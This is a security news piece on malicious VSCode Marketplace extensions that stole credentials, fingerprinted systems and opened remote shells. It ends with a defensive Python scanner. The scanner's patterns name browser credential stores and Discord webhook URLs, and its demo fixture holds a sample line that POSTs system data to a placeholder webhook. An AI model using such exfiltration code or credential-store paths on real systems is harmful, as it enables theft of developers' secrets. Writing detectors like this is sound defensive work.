
Malicious VSCode Extensions: Password Theft and Remote Shell Exploits

Check Point discovered multiple malicious extensions on Microsoft’s Visual Studio Code Marketplace through which threat actors could steal valuable information.

Visual Studio Code (VSCode), whose extensions are distributed through the VSCode Marketplace, is a widely used and freely available source code editor. It offers developers an efficient and customizable coding environment, supporting various programming languages, frameworks, and tools.

Diving into details

VSCode Marketplace, where users can find and download extensions to enhance their coding experience, has recently become a target for cybercriminals.
  • Researchers revealed that the malicious extensions were downloaded by Windows developers a total of 46,600 times.
  • The malware provided threat actors with unauthorized access to victim machines, enabling them to pilfer credentials, collect system information, and establish a remote shell on the victim's machine.

What were the extensions?

  • Theme Dracula Dark - This extension was primarily designed to enhance color consistency in the Dracula theme for VS Code. However, alongside its intended functionality, the extension executed unauthorized actions by collecting basic system information from developers' machines. This included details such as the hostname, operating system, CPU platform, total memory, and CPU information. Notably, the extension garnered significant popularity, with over 45,000 downloads by users.
  • Python-vscode - This extension attracted 1,384 downloads, despite lacking a description and being uploaded by a user with the name 'testUseracc1111'. Upon code analysis, it was discovered that the extension serves as a C# shell injector, allowing the execution of code or commands on the victim's machine. This indicates malicious intent behind the extension, as it provides unauthorized access and control over the compromised system.
  • Prettiest java - The extension in question appears to have been designed to imitate the well-known code formatting tool called 'prettier-java,' as suggested by its name and description. The extension pilfered stored credentials or authentication tokens from various applications, including Discord, Discord Canary, Google Chrome, Opera, Brave, and Yandex. The stolen information was then transmitted to the attackers using a Discord webhook. Despite its malicious nature, the extension managed to amass 278 installations, potentially putting a significant number of users at risk.

The bottom line

Software repositories that allow user contributions, including npm and PyPI, pose major supply chain security risks. Check Point's recent findings highlight that malicious submissions targeting Windows developers are becoming prevalent, mirroring the patterns observed in other software repositories. To mitigate these risks, users of the VSCode Marketplace and similar user-supported repositories are strongly advised to exercise caution. It is recommended to exclusively install extensions from trusted publishers with a substantial number of downloads and positive community ratings.
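Beyond checking publisher reputation, a defender can audit the extensions already installed for the behaviours described above (Discord webhook exfiltration, reads of browser credential stores, system fingerprinting). The following scanner is an added example, not code from the report or from Check Point; the indicator patterns, the extensions directory layout (a directory per extension under a root such as ~/.vscode/extensions) and the sample extension sources are all constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators matching the behaviours described in the report
# (patterns constructed here for illustration, not taken from the extensions).
INDICATORS = {
    "discord_webhook_exfil": re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "browser_credential_store": re.compile(r"Login Data|Local State|leveldb", re.I),
    "system_fingerprint": re.compile(r"\bos\.(?:hostname|platform|totalmem|cpus)\s*\(", re.I),
}
# Fingerprinting alone is common in benign telemetry; treat it as a weak signal.
WEAK = {"system_fingerprint"}


def scan_source(text: str) -> set[str]:
    """Return the names of every indicator that matches this source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan_extensions(root: Path) -> dict[str, set[str]]:
    """Scan each extension directory under root (assumed layout: one directory
    per extension) and return {extension_dir_name: indicators} for extensions
    that show at least one strong indicator."""
    findings = {}
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        hits = set()
        for src in ext_dir.rglob("*.js"):
            hits |= scan_source(src.read_text(encoding="utf-8", errors="ignore"))
        if hits - WEAK:  # report only when a strong indicator is present
            findings[ext_dir.name] = hits
    return findings


def demo() -> dict[str, set[str]]:
    """Build two constructed extensions in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        bad = root / "testuser.prettiest-java-0.0.1"  # constructed sample
        bad.mkdir()
        (bad / "extension.js").write_text(
            'const os = require("os");\n'
            'const store = path.join(appData, "Google/Chrome/User Data/Default/Login Data");\n'
            'fetch("https://discord.com/api/webhooks/0000/EXAMPLE", {method: "POST", body: os.hostname()});\n'
        )
        good = root / "publisher.theme-only-1.0.0"  # constructed sample
        good.mkdir()
        (good / "extension.js").write_text("exports.activate = () => {};\n")
        return scan_extensions(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {', '.join(sorted(hits))}")
```

Run it against a real extensions root by calling scan_extensions(Path.home() / ".vscode" / "extensions"); a hit is a prompt for manual review of that extension's source, not proof of malice.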